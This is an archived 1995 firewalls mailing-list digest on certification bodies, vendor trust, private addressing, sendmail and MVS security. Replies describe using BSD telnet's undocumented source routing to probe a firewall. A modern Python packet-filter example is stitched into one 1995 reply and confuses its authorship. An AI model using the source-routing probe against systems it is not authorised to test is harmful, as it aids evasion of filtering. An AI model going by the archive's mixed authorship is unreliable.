smith@sctc.com  secure computing corporation

From firewalls-owner Mon Sep 11 08:32:52 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Sounds like the politicians are gathering
Date: Mon, 11 Sep 95 11:19:16 -0400
Message-Id: <9509111519.AA18746@uvs1.orl.mmc.com>

Someone claiming to be the president of the ISSA (no signature) writes:

>I agree with this concern. The National Research Council issued a
>report on sensitive but unclassified computing in the US entitled
>"Computers at Risk." In that report they suggested that an
>independent organization be formed, the Information Security
                                         ^^^^^^^^^^^
>Foundation.
> We are talking about a non-government organization
>under the direction and review of industry and the information
>security profession (of course with an interface to government).
>It is hoped that this organization would be given the authority to
>reduce export restrictions.

Note that expertise in the subject does not seem to be a requirement (sorry, but I have seen too many of these "executive-level" committees formed that spend years trying to figure out an agenda). Have walked out of meetings that I could see headed that way.

Also really needs to be an *International* organization & do not see how "authority to reduce export restrictions" plays - that is pure *politics*. IFIP might make a good parent but the real question is funding.
SAE is funded by members and was created by engineers. Those funded by government grants tend to be politically correct.

>IMPORTANT POINT: The ISF (now IISF) would
>not be part of ISSA. It is bigger than ISSA or any organization.
>The IISF needs to not only provide certification (firewalls,
>systems, people, etc.) and testing but standards development and
>research.

Agree with this but is sounding more like a political plum by the moment & can see there are plenty of chiefs ready to run it.

Warmly,
Padgett

ps not down on the concept, just want to be sure of the agenda. Have seen too many such "councils" in the past where the appointees were those who looked good on TV.

From firewalls-owner Mon Sep 11 09:00:19 1995
From: Richard Owen
To: firewalls@GreatCircle.COM
Subject: Re: BOS: firewall certification authority -Reply -Reply
Date: Mon, 11 Sep 1995 10:32:10 -0600

ISSA stands for the Information Systems Security Association. We are the non-profit organization for people involved in the protection of information assets (Computer Security, Data Security, EDP Security, etc.). In other words a collection of security managers, security administrators, data base administrators, edp auditors, disaster recovery personnel, system programmers, system designers, professors, etc.
For example: I am the Information Security Administrator (manager) for the Texas Attorney General, my VP is a Data Security Manager for Wells Fargo, Membership Director is the VP of Data Security for First USA, etc. Of course, as pres, I would be very pleased to have my headquarters send you more info.

IISF is the International Information Security Foundation - Name had to be changed because someone grabbed up the ISF name. The intent of IISF is still the same as noted in the Computers at Risk book (establish standards, certification, testing, coordination between public and private and between US and foreign). I see it as an opportunity for us to define our own destiny.

Rich Owen

>>> 09/11/95 08:57am >>>
Please clue in the clueless. What is ISSA? What is IISF? Aside from reducing export restrictions, what is ISF supposed to do?

Tenna Sakai (tws@wh.bayer.com)
Bayer Research Center

From firewalls-owner Mon Sep 11 09:02:40 1995
From: tws@wh.bayer.com
To: Richard.Owen@OAG.STATE.TX.US, firewalls@GreatCircle.COM
Subject: Re: BOS: firewall certification authority -Reply
Date: Mon, 11 Sep 95 10:57:04 -0400
Message-Id: <9509111457.AA25265@mrcs1>

Please clue in the clueless. What is ISSA? What is IISF? Aside from reducing export restrictions, what is ISF supposed to do?
Tenna Sakai (tws@wh.bayer.com)
Bayer Research Center

> From: Richard Owen
> To: firewalls@GreatCircle.COM
> Subject: BOS: firewall certification authority -Reply
>
> I agree with this concern. The National Research Council issued a
> report on sensitive but unclassified computing in the US entitled
> "Computers at Risk." In that report they suggested that an
> independent organization be formed, the Information Security
> Foundation. We are talking about a non-government organization
> under the direction and review of industry and the information
> security profession (of course with an interface to government).
> It is hoped that this organization would be given the authority to
> reduce export restrictions.
> As President of ISSA, I am very interested in seeing this happen.
> I have even proposed that ISSA would help to establish such an
> organization. IMPORTANT POINT: The ISF (now IISF) would
> not be part of ISSA. It is bigger than ISSA or any organization.
> The IISF needs to not only provide certification (firewalls,
> systems, people, etc.) and testing but standards development and
> research. ISSA currently has a committee that is trying to define
> the Generally Accepted System Security Principles (GSSP) as also
> called for in the Computers at Risk report. The IISF should be a
> place to pull all of our activities into a unified direction. This is
> what I have proposed to a working group of the President's
> National Security & Telecommunications Advisory Council.
From firewalls-owner Mon Sep 11 09:30:09 1995
From: peter@nmti.com (Peter da Silva)
To: schan@gcau.com.au (Stanley Chan)
Cc: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #518
Date: Mon, 11 Sep 1995 10:44:13 -0500 (CDT)
Message-Id: <9509111544.AA24311@sonic.nmti.com.nmti.com>
In-Reply-To: from "Stanley Chan" at Sep 11, 95 04:36:00 pm

> Well I think if we have to worry about a firewall's source code, I would
> spend my time worrying about all the kernels problem instead.
> How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who
> wrote UNIX os for sale and yet they never ever review their source code to
> you for certification.
http://freebsd.org/
http://netbsd.org/
http://bsdi.com/

From firewalls-owner Mon Sep 11 10:35:11 1995
From: David Schnardthorst
To: peter@nmti.com (Peter da Silva)
Cc: firewalls@greatcircle.com
Subject: Re: Firewalls-Digest V4 #518
Date: Mon, 11 Sep 1995 12:09:50 -0500 (CDT)
Message-Id: <199509111709.MAA05143@strydr.strydr.com>
In-Reply-To: <9509111544.AA24311@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 11, 95 10:44:13 am
Organization: Stryder Communications, Inc.

In the Original, Peter da Silva Says
>
>> Well I think if we have to worry about a firewall's source code, I would
>> spend my time worrying about all the kernels problem instead.
>> How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who
>> wrote UNIX os for sale and yet they never ever review their source code to
>> you for certification.
>
> http://freebsd.org/
> http://netbsd.org/
> http://bsdi.com/

Good point. Trust is believing that the person in question is not going to mislead you. In a sense, this whole discussion is turning into a situation where every firewall vendor is guilty until proven innocent. If they are going to build a firewall product for people to purchase, do you believe they would risk putting a back door in the product on purpose?
Even if they have the right statements saying that they are not responsible, if they put them in on purpose, and it is proven in court, they may still be liable. You have to trust them to do it right, or you should do it yourself. What other options are there?

Who is to say that having a Firewall Certification Committee would make sure there are no problems with a firewall? They could be just like the vendor and falsify information, or let it pass through. Unless something comes up to disprove a vendor's credibility, you have to trust them.

============================================================================
David Schnardthorst              System Administrator  * Phone: (314)838-6839
Stryder Communications, Inc.                           * Fax: (314)838-8527
869 St. Francois                                       * E-Mail: ds3721@strydr.com
Florissant, MO 63031                                   * URL: http://www.strydr.com
============================================================================

From firewalls-owner Mon Sep 11 11:02:40 1995
From: Mark_W_Loveless@smtp.bnr.com
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security), firewalls@greatcircle.com
Subject: Re: Sounds like the politicians are gathering
Date: Mon, 11 Sep 95 12:50:18 CST
Message-Id: <9508118108.AA810849184@smtp.bnr.com>

I agree, but what it really sounds like is a layer of red tape that most engineers worth half their salt will walk around anyway.
There is no way to develop a "certification" that is timely and fair to all vendors and users. I think real world testing is the best -- granted tiger team work doesn't seem to pay but with the attention the net is getting lately maybe their time has finally come. When there is a need, you create a service that people will pay for. I'd rather pay for expertise NOW than await some council to certify something.

Mark

______________________________ Reply Separator _________________________________
Subject: Sounds like the politicians are gathering
Author:  padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) at internet
Date:    9/11/95 11:19 AM

Someone claiming to be the president of the ISSA (no signature) writes:

>I agree with this concern. The National Research Council issued a
>report on sensitive but unclassified computing in the US entitled
>"Computers at Risk." In that report they suggested that an
>independent organization be formed, the Information Security
                                         ^^^^^^^^^^^
>Foundation.
> We are talking about a non-government organization
>under the direction and review of industry and the information
>security profession (of course with an interface to government).
>It is hoped that this organization would be given the authority to
>reduce export restrictions.

Note that expertise in the subject does not seem to be a requirement (sorry, but I have seen too many of these "executive-level" committees formed that spend years trying to figure out an agenda). Have walked out of meetings that I could see headed that way.

Also really needs to be an *International* organization & do not see how "authority to reduce export restrictions" plays - that is pure *politics*. IFIP might make a good parent but the real question is funding. SAE is funded by members and was created by engineers. Those funded by government grants tend to be politically correct.

>IMPORTANT POINT: The ISF (now IISF) would
>not be part of ISSA. It is bigger than ISSA or any organization.
>The IISF needs to not only provide certification (firewalls,
>systems, people, etc.) and testing but standards development and
>research.

Agree with this but is sounding more like a political plum by the moment & can see there are plenty of chiefs ready to run it.

Warmly,
Padgett

ps not down on the concept, just want to be sure of the agenda. Have seen too many such "councils" in the past where the appointees were those who looked good on TV.

From firewalls-owner Mon Sep 11 17:30:05 1995
From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas König)
To: firewalls@greatcircle.com
Subject: Re: Firewalls-Digest V4 #518
Date: Tue, 12 Sep 1995 02:06:01 +0200 (MET DST)
Message-Id: <199509120006.CAA02771@mvmampc66.ciw.uni-karlsruhe.de>
In-Reply-To: <9509111544.AA24311@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 11, 95 10:44:13 am

Peter da Silva wrote:
>> How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who
>> wrote UNIX os for sale and yet they never ever review their source code to
>> you for certification.
> http://freebsd.org/
> http://netbsd.org/
> http://bsdi.com/

While we're at it, you might also include http://www.linux.org/ :-)

--
Thomas Koenig, Thomas.Koenig@ciw.uni-karlsruhe.de, ig25@dkauni2.bitnet.
The joy of engineering is to find a straight line on a double logarithmic diagram.

From firewalls-owner Mon Sep 11 17:32:42 1995
From: frankw@in.net (Frank Willoughby)
To: Julian Assange
Cc: firewalls@greatcircle.com
Subject: Re: wank worm
Date: Mon, 11 Sep 95 19:05:23 -0400
Message-Id: <9509112305.AA27141@su1.in.net>

I captured & analyzed the wank worm long ago ('89 sounds about right). The code was some of the *worst* spaghetti-code that I've seen in a long time. The fortune cookie in the wank worm was not a standard fortune cookie and had its own routines to generate the particular fortune. I doubt you want this particular fortune file for your program as the messages generated by the fortune cookie in the wank worm were obscene & vulgar.

FWIW, I destroyed the code after the analysis.

Out of curiosity, what problem are you trying to solve? I'm sure that other versions of the fortune cookie are still on the net somewhere. Is there a functionality in the fortune cookie that isn't present in later versions?

Best Regards,

Frank

> I know this is off target, but what the heck.
>
> I am trying to locate specific information that was used in the Wank Worm
> circa mid 1989. In particular I am trying to locate the fortune cookie file
> that was included in it. I believe the fortunes were pulled from the bsd
> fortune program.
> That said, finding which versions of fortune were extant
> during that period and then finding an existing copy of that version now
> has become a little trying.
>
> If anyone on this list had personal experience with the worm at the time or
> can point me to ancient versions of fortune (oldest I could locate was
> bsd42/tahoe/reno) I'd certainly appreciate it.
>
> -Julian Assange (proff@suburbia.net)

From firewalls-owner Mon Sep 11 19:00:08 1995
From: Alex Sharpe
To: "'firewalls distribution list'"
Cc: "Sean W O'Neill"
Subject: Encryption Add-ons to Firewall One?
Date: Mon, 11 Sep 95 14:15:00 PDT
Message-Id: <30550E83@bass.rssi.com>

Anyone know of an add-on to Firewall One that provides link encryption to designated IP Addresses? Or, products which can provide this function in a plug and play fashion?
From firewalls-owner Mon Sep 11 19:02:40 1995
From: dave.conklin@Harris.COM (Dave Conklin)
To: firewalls@greatcircle.com
Subject: Looking for source route packet generator code.
Date: Mon, 11 Sep 1995 21:32:10 -0400
Message-Id: <9509120132.AA06140@lazarus.corp.harris.com>

Hi. I'm looking for code that will generate source routed packets so that I may test my firewalls. Anyone with such a beast, please email. TIA.
Dave Conklin
dave.conklin@harris.com

From firewalls-owner Mon Sep 11 22:00:08 1995
From: Ken Hardy
To: Dave Conklin
Cc: firewalls@greatcircle.com
Subject: Re: Looking for source route packet generator code.
Date: Mon, 11 Sep 1995 23:43:31 -0500 (CDT)
In-Reply-To: <9509120132.AA06140@lazarus.corp.harris.com>

On Mon, 11 Sep 1995, Dave Conklin wrote:
> Hi. I'm looking for code that will generate source routed packets so
> that I may test my firewalls. Anyone with such a beast, please email.

The telnet in the BSD sources will source route if asked to. You ask it by the format of the destination, something like "telnet @hop1@hop2:dest", though you'd better look to be sure; it's not in the man page -- I had to look in the code to figure it out. And the source code is there if you're looking to write your own source routing pgm.
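The firewall-side counterpart of the source-routed packets discussed in this thread: what a filter must do to recognise and drop them. This is an added example, not code from any poster and not the BSD telnet source; it walks the IPv4 option list, reports any loose or strict source route with its hop list, and fails closed on a malformed header. The sample headers, addresses and function names are all constructed for the example.

```python
"""Firewall-side check for IP source routing: parse the IPv4 option list,
report any LSRR/SSRR option, and drop the datagram. Added example; the
sample headers below are constructed, not captured from any real host."""
import ipaddress

# IPv4 option type octets from RFC 791 (copied flag, class and number combined).
IPOPT_EOL = 0      # end of option list
IPOPT_NOP = 1      # no-operation, used as padding
IPOPT_RR = 7       # record route: records hops but does not steer the packet
IPOPT_LSRR = 131   # loose source and record route
IPOPT_SSRR = 137   # strict source and record route


def parse_ipv4_options(packet):
    """Return a list of (type, data) for every option in the header.

    Raises ValueError on anything malformed, so a caller can fail closed.
    """
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    version = packet[0] >> 4
    ihl = (packet[0] & 0x0F) * 4          # header length in bytes
    if version != 4 or ihl < 20 or ihl > len(packet):
        raise ValueError("not a well-formed IPv4 header")
    options = []
    i = 20                                # options start after the fixed header
    while i < ihl:
        opt_type = packet[i]
        if opt_type == IPOPT_EOL:
            break
        if opt_type == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= ihl:
            raise ValueError("option is missing its length octet")
        length = packet[i + 1]
        if length < 2 or i + length > ihl:
            raise ValueError("option length runs past the header")
        options.append((opt_type, bytes(packet[i + 2:i + length])))
        i += length
    return options


def source_route(packet):
    """Return (kind, pointer, hops) for an LSRR/SSRR option, or None if absent."""
    for opt_type, data in parse_ipv4_options(packet):
        if opt_type not in (IPOPT_LSRR, IPOPT_SSRR):
            continue
        if len(data) < 1 or (len(data) - 1) % 4:
            raise ValueError("source route address list is not a multiple of 4")
        pointer = data[0]                 # offset of the next hop, from the type octet
        addrs = data[1:]
        hops = [str(ipaddress.IPv4Address(addrs[k:k + 4]))
                for k in range(0, len(addrs), 4)]
        return ("loose" if opt_type == IPOPT_LSRR else "strict"), pointer, hops
    return None


def firewall_verdict(packet):
    """Policy: no source-routed datagrams; malformed headers are dropped too."""
    try:
        route = source_route(packet)
    except ValueError as err:
        return "drop", "malformed header: %s" % err
    if route is None:
        return "accept", "no source route option"
    kind, _pointer, hops = route
    return "drop", "%s source route via %s" % (kind, " -> ".join(hops))


# Constructed sample: 32-byte header carrying a loose source route.
LSRR_PACKET = bytes([
    0x48, 0x00, 0x00, 0x20,   # version 4, IHL 8 (32 bytes); TOS; total length 32
    0x00, 0x01, 0x00, 0x00,   # identification; flags and fragment offset
    0x40, 0x06, 0x00, 0x00,   # TTL 64; protocol 6 (TCP); checksum left zero here
    0x0a, 0x00, 0x00, 0x05,   # source 10.0.0.5
    0xc0, 0x00, 0x02, 0x01,   # destination 192.0.2.1 (first hop)
    0x83, 0x0b, 0x04,         # LSRR, length 11, pointer 4
    0xc0, 0x00, 0x02, 0x02,   # next hop 192.0.2.2
    0xc6, 0x33, 0x64, 0x09,   # final destination 198.51.100.9
    0x00,                     # EOL pads the option area to a 32-bit boundary
])
# Constructed sample: the same header with no options at all (IHL 5).
PLAIN_PACKET = bytes([
    0x45, 0x00, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00, 0x40, 0x06,
    0x00, 0x00, 0x0a, 0x00, 0x00, 0x05, 0xc0, 0x00, 0x02, 0x01,
])
# Constructed sample: NOP padding plus a minimal record-route option (IHL 6).
RR_PACKET = bytes([
    0x46, 0x00, 0x00, 0x18, 0x00, 0x01, 0x00, 0x00, 0x40, 0x06, 0x00, 0x00,
    0x0a, 0x00, 0x00, 0x05, 0xc0, 0x00, 0x02, 0x01, 0x01, 0x07, 0x03, 0x04,
])
# Constructed sample: LSRR whose length octet claims 32 bytes the header lacks.
BAD_PACKET = LSRR_PACKET[:21] + b"\x20" + LSRR_PACKET[22:]

if __name__ == "__main__":
    for name, pkt in [("lsrr", LSRR_PACKET), ("plain", PLAIN_PACKET),
                      ("rr", RR_PACKET), ("bad", BAD_PACKET)]:
        print(name, firewall_verdict(pkt))
```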
- KH

From firewalls-owner Mon Sep 11 22:32:40 1995
From: Sam Howard
To: "'Firewalls'"
Subject: External Client Access Policy
Date: Tue, 12 Sep 95 00:22:00 CDT
Message-ID: <30551977@msmailgwy.dataserv.com>

Hi. We here at dataserv are in the position that we will have to let some of our clients access our network (I say "have to" because I am a sysadm, not a sales person :)

Does anyone have any "policy" statements that they'd be willing to share? We are looking to have people at our clients sign a "Network Access Agreement" stating things like: thou shalt not do bad things, etc, etc, but the verbiage on that is not anywhere near complete, so I thought I'd ask around for hints...anyone?

How about things like an NDA, or Non-Compete (some of the vendors working at a client are direct competitors to us, which is kinda a sticky situation for us...)
I seem to recall that some of this stuff might be archived somewhere, but I could not find a reference (we barely have Internet mail right now, so WWW sites are not useful to me at this point...I *can* ftp and telnet, tho).

Thanks!

Sam
--
Sam.Howard@dataserv.com (MS-Mail GW...randomly wraps text lines)
showard@dataserv.com (sometimes goes to unix...sometimes insane aliases sends it to MS-Mail anyways...)

From firewalls-owner Tue Sep 12 05:00:09 1995
From: jim.brown@ptech.com (Jim Brown)
To: Alex Sharpe, "'firewalls distribution list'"
Cc: "Sean W O'Neill"
Subject: Re: Encryption Add-ons to Firewall One?
Date: Tue, 12 Sep 1995 07:49:23 -0400
Message-Id: <9509121149.AA11587@nexus.ptech.com>

Hughes has a product called NetLock which should fit the bill. For more information, check out the rsa catalog at http://www.rsa.com. (I have no affiliation with either Hughes or RSA. :)

jim

At 02:15 PM 9/11/95 PDT, Alex Sharpe wrote:
>
> Anyone know of an add-on to Firewall One that provides link encryption to
> designated IP Addresses? Or, products which can provide this function in a
> plug and play fashion.
>
>
_________ ___jnb___

From firewalls-owner Tue Sep 12 06:02:05 1995
From: "Bradley E. Hubbard"
To: "'smtp:firewalls@greatcircle.com'"
Subject: IPX firewall?
Date: Tue, 12 Sep 95 08:23:00 PDT
Message-Id: <3055A645@bass.rssi.com>

Hello,

I'm wondering if anyone knows of any firewall products that have been developed in and for an IPX environment?

Thanks in advance,

Brad Hubbard
behubba@rssi.com

From firewalls-owner Tue Sep 12 06:02:41 1995
From: David Miller
Subject: Re: Looking for source route packet generator code.
Date: Tue, 12 Sep 1995 08:36:06 -0400 (EDT)
To: Dave Conklin cc: firewalls@greatcircle.com In-Reply-To: <9509120132.AA06140@lazarus.corp.harris.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 11 Sep 1995, Dave Conklin wrote: > Hi. I'm looking for code that will generate source routed packets so > that I may test my firewalls. Anyone with such a beast, please email. Comes builtin to many of the bsd telnets. FreeBSD and bsd/os certaily have it. The catch is that it's only "documented" in the source code. Use it with a "telnet @host1@host2@host3.somewhere.dom" where host1 and host2 are the hosts to pass through. And you must type the "@"'s just as shown here:) Hope this helps, --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Tue Sep 12 08:34:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05752 for firewalls-outgoing; Tue, 12 Sep 1995 08:25:14 -0700 Received: from dot.ability.net (dot.ability.net [205.197.67.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA05730 for ; Tue, 12 Sep 1995 08:25:09 -0700 Received: from yakko.ability.net (dkrapf@yakko.ability.net [204.192.126.17]) by dot.ability.net (8.6.12/8.6.12) with ESMTP id LAA26058 for ; Tue, 12 Sep 1995 11:22:19 -0400 From: Don Krapf Received: (dkrapf@localhost) by yakko.ability.net (8.6.12/8.6.12) id LAA06616 for firewalls@greatcircle.com; Tue, 12 Sep 1995 11:22:26 -0400 Message-Id: <199509121522.LAA06616@yakko.ability.net> Subject: Re: firewall with only one IP address ??? 
To: firewalls@greatcircle.com (FireWalls List) Date: Tue, 12 Sep 1995 11:22:25 -0400 (EDT) In-Reply-To: <950905061735_100632.1345_BHL70-1@CompuServe.COM> from "matt" at Sep 5, 95 02:17:35 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 514 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk matt writes: > > Hi all, > > we have one question: > Our firm now wants to connect to the internet, but we will get only > one official IP-address. First, we believed this would be no problem > because we'll use the 10.0.0.0 net as our internal network and we > will be able to manage the connections over proxies. Why not buy access for a full network instead of a single address? You're not trying to hide a network behind a single address to avoid paying your ISP for routing to your network, are you? Don From firewalls-owner Tue Sep 12 10:04:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA07345 for firewalls-outgoing; Tue, 12 Sep 1995 09:36:22 -0700 Received: from netcomsv.netcom.com (uucp2.netcom.com [163.179.3.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA07330 for ; Tue, 12 Sep 1995 09:36:18 -0700 Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id JAA27653; Tue, 12 Sep 1995 09:27:41 -0700 Received: by compwr.com (4.1/) id AA01600; Tue, 12 Sep 95 09:24:35 PDT Date: Tue, 12 Sep 1995 09:24:34 -0700 (PDT) From: Ken Dayton X-Sender: kd@sparcB To: Firewalls@GreatCircle.Com Subject: Secure version of Sendmail Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings: I have heard of a public domain version of sendmail (with source) that is available somewhere. Does anyone know where to get it? Thanks. 
Ken Dayton CommPower Inc., Camarillo CA From firewalls-owner Tue Sep 12 10:22:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA07705 for firewalls-outgoing; Tue, 12 Sep 1995 09:45:22 -0700 Received: from usasmtp.usagroup.org ([198.70.128.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA07698 for ; Tue, 12 Sep 1995 09:45:18 -0700 Received: from DOMAIN-E-Message_Server by usasmtp.usagroup.org with Novell_GroupWise; Tue, 12 Sep 1995 11:45:36 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 12 Sep 1995 11:42:18 -0600 From: Ed Hepker To: Firewalls@GreatCircle.COM Subject: Compuserve & Internet Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anybody have any thoughts on the best way to allow employees to use Compuserve (we have a business requirement to do so) and prevent them from accessing the net through it? Obviously, this kind of access can kabosh the benefits of our firewall. I haven't found a decent way to do this yet, so any thoughts/experiences would be appreciated. Thanks in advance - Ed Hepker USA GROUP Indianapolis, Indiana ehepker@usasmtp.usagroup.org These comments do not represent or resemble any opinions currently or previously held by USA GROUP (or anyone else, for that matter). 
From firewalls-owner Tue Sep 12 10:30:19 1995
From: Alan Hannan
Message-Id: <199509121707.MAA14465@gaijin.mid.net>
Subject: Re: firewall with only one IP address ???
To: dkrapf@ability.net (Don Krapf)
Date: Tue, 12 Sep 1995 12:07:09 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199509121522.LAA06616@yakko.ability.net> from "Don Krapf" at Sep 12, 95 11:22:25 am

matt> Hi all,
matt>
matt> we have one question:
matt> Our firm now wants to connect to the internet, but we will get only
matt> one official IP-address. First, we believed this would be no problem
matt> because we'll use the 10.0.0.0 net as our internal network and we
matt> will be able to manage the connections over proxies.

Matt, this will work fine.

krapf> Why not buy access for a full network instead of a single address?
krapf> You're not trying to hide a network behind a single address to avoid
krapf> paying your ISP for routing to your network, are you?

Good heavens. Using an RFC1597 network makes sense for so many reasons, none of which you have even attempted to rebut. The amount of networks routed is a significant issue.

Many months ago, people grabbed address space and announced a tremendous amount of routes, to networks which they did not utilize very well. Accordingly, the equipment on the backbone was outdated, put to stress, and caused CIDR and other aggregation methods. To imply that one is "cheap" for being responsible with address space is silly.

Also, we gain significant security advantages by putting our internal networks on RFC1597 networks. First, we lose the ability for internet sites to directly attack our internal hosts, as the routes are not propagated through the internet. Secondly, it gains us larger address space that we can use without registering or notifying anyone. Third, it gives one the ability to implement a /8 internal network structure within one's network.

IMHO, using rfc1597 for internal networks protected by a firewall is a good thing, for the above reasons and others.

So far as I can see, the only downside to using RFC1597 on an internal firewalled network is that IF someday one decides to do away with the firewall, then the company will incur moderately large renumbering costs. My thought is that this is a small risk, and even if it were to happen, it is likely bootp, dhcp, or some variant will have evolved far enough to make this a non-issue.

$0.02

--
Alan Hannan                        Email: alan@mid.net
Network Systems Administrator      Voice: (402) 472-0239
MIDnet, Lincoln NOC Office         Fax: (402) 472-0240
"The only way to make a man trustworthy is to trust him" - Henry Stimson

From firewalls-owner Tue Sep 12 10:34:14 1995
Message-Id: <199509121727.MAA13967@psisa.com>
Subject: Re: firewall with only one IP address ???
To: dkrapf@ability.net (Don Krapf)
Date: Tue, 12 Sep 1995 12:27:35 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199509121522.LAA06616@yakko.ability.net> from "Don Krapf" at Sep 12, 95 11:22:25 am
From: chk@psa.pencom.com (Christian Kuhtz)

> > we have one question:
> > Our firm now wants to connect to the internet, but we will get only
> > one official IP-address. First, we believed this would be no problem
> > because we'll use the 10.0.0.0 net as our internal network and we
> > will be able to manage the connections over proxies.
>
> Why not buy access for a full network instead of a single address? You're
> not trying to hide a network behind a single address to avoid paying your
> ISP for routing to your network, are you?

What's your point, Inquisitor? It's perfectly fine to "hide" several thousand machines behind one IP (or a couple in case you scale firewalls dynamically as we do). I do this here (see sig) for our client all the time. And when our client asked their provider for connectivity, they knew what they were getting.

I mean, after all this is not about IPs, this is about bandwidth. And everybody will wake up if you ask for a T3 with only one registered address. I mean, you're not going to connect a zillion users of a 28k8 dialup line.... get real and chill, and get a life since you won't stay long in biz with that attitude.

Besides, it's pretty unbelievable if someone charges for routing my IPs, unless I expect them to do something very extravagant with it (like dynamic routing for multiple ports of entry for redundancy and providing network management via a NOC). I'm buying *connectivity*, and routing is a necessity for it. It's like buying a new car and tires are considered a preferred customer option.

Last point, it's simply not my provider's business to know how many IPs I'm using internally nor anything else. All you need is rock solid connectivity to the firewall. That's what one pays for. And telling a provider (as any other external company) about my network/system config usually violates security policies anyways.

Maybe one should issue a public warning not to do business with disability.net.

Dizzy from shaking my head,

Chris
--
Christian Kuhtz                                 +1 914-684-4467
Pencom System Administration Services           fax: +1 914-684-3791
on-location at Advantis/IBM Global Network, White Plains, NY

From firewalls-owner Tue Sep 12 11:00:55 1995
Date: Tue, 12 Sep 1995 10:54:37 -0700
Message-Id: <199509121754.KAA17051@shell1.best.com>
From: Yobie Benjamin
To: firewalls@GreatCircle.COM
Subject: Re: firewall with only one IP address ???

Agreed with Don:

What's the deal? A class C will give you 256 IP addresses and most corporations can qualify for this. Maybe you should go to some of the larger ISPs if you're having a problem.
From firewalls-owner Tue Sep 12 11:02:49 1995
Message-Id: <199509121736.MAA14128@psisa.com>
Subject: Re: Secure version of Sendmail
To: kd@compwr.com (Ken Dayton)
Date: Tue, 12 Sep 1995 12:36:47 -0500 (CDT)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: from "Ken Dayton" at Sep 12, 95 09:24:34 am
From: chk@psa.pencom.com (Christian Kuhtz)

> I have heard of a public domain version of sendmail (with source)
> that is available somewhere. Does anyone know where to get it?

The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is quasi public domain (check the license out for details).

Enjoy and drop me a note if you need help getting started.

Best Regards,

Chris
--
Christian Kuhtz                                 +1 914-684-4467
Pencom System Administration Services           fax: +1 914-684-3791
on-location at Advantis/IBM Global Network, White Plains, NY

From firewalls-owner Tue Sep 12 11:28:38 1995
Date: Tue, 12 Sep 1995 10:40:39 -0700
From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman)
Message-Id: <199509121740.KAA14241@sjsinc.com>
To: firewalls@greatcircle.com
Subject: Re: Secure version of Sendmail

Ken:

> I have heard of a public domain version of sendmail (with source)
> that is available somewhere. Does anyone know where to get it?

"The source Luke, all answers are in the source...."

The guys who write it hang out at:

ftp://ftp.cs.berkeley.edu

and one can "___ALWAYS___" find the latest release and bug-fixes here...

Regards, b c++'ing u, %-)

sjs
-------------------------------------------------------------------------------
Stefan Jon Silverman - President
SJS Associates, N.A., Inc.
Distributed Systems Architecture & Implementation
572 Chestnut Street, San Francisco, Ca. 94133
Phone: 415 989 2741   Fax: 415 989 7250   Cell: 415 519 3494
E-mail: sjs@sjsinc.com
-------------------------------------------------------------------------------
Weebles wobble, but they don't fall down!!!
-------------------------------------------------------------------------------

From firewalls-owner Tue Sep 12 11:34:39 1995
From: gregg@smtpgate.Disclosure.COM
Date: Tue, 12 Sep 95 13:56:48 est
Message-Id: <9508128109.AA810939662@smtpgate.disclosure.com>
To: Firewalls@Greatcircle.COM
Subject: Re: Re: Interpreting CERT advisories

Jet - (J.Eric Townsend-jet@abulafia.genmagic.com) writes:

==> How many MVS systems are plugged directly into the internet? How many
==> are actually used for TCP/IP related services? (Where's my Mosaic for
==> MVS? :-)
==> IMHO, Suns get broken into all the time because:
==> -- everybody has one to practice on
==> -- they were designed with being useful in mind.

ITEM 1:

==> IMHO, Suns get broken into all the time because:
==> -- everybody has one to practice on

Excuse me?!? MVS has been *in production* since the late 70's; abundantly installed around the World. IMHO, plenty of time/opportunity for hackers to try hacking in. The reason you don't hear about hackers hacking MVS is because, well, you can't. Much too difficult. In the 9 MVS shops I've worked in all were protected by non-hackable security software called ACF2. Perhaps an employee could plant back doors thinking he/she could use them undetected in the future. Well, no can do. SMF records *everything* that occurs in MVS. So you turn off SMF recording. Difficult because to do so you must run "authorized." Which means your program must be in the link and apf lists; and adding your programs to those lists... well, it goes on and on. Now all of this isn't to say that someone couldn't write a program to, say, steal raw data straight from a disk via TCP/IP. But what thrill is that? Nay, hacking MVS (or trying to) is a waste of time.

ITEM 2:

==> How many MVS systems are plugged directly into the internet? How many
